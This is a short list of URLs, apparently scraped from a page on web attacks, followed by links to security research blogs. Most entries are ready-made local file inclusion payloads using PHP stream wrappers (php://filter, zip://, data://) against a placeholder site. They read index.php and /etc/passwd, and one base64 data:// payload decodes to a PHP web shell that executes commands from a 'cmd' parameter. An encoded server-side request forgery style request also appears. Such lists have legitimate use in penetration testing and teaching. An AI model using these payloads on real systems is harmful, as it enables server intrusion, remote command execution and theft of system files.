- http://vulnerable-site.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
- http://vulnerable-site.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
- http://payload.zip
- http://vulnerable-site.com/index.php?page=zip://shell.jpg%23payload.php
- http://vulnerable-site.com/?page=data://text/plain,
- http://vulnerable-site.com/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
- http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1
- https://codewhitesec.blogspot.com
- https://blog.ripstech.com
- https://rhinosecuritylabs.com
- Show all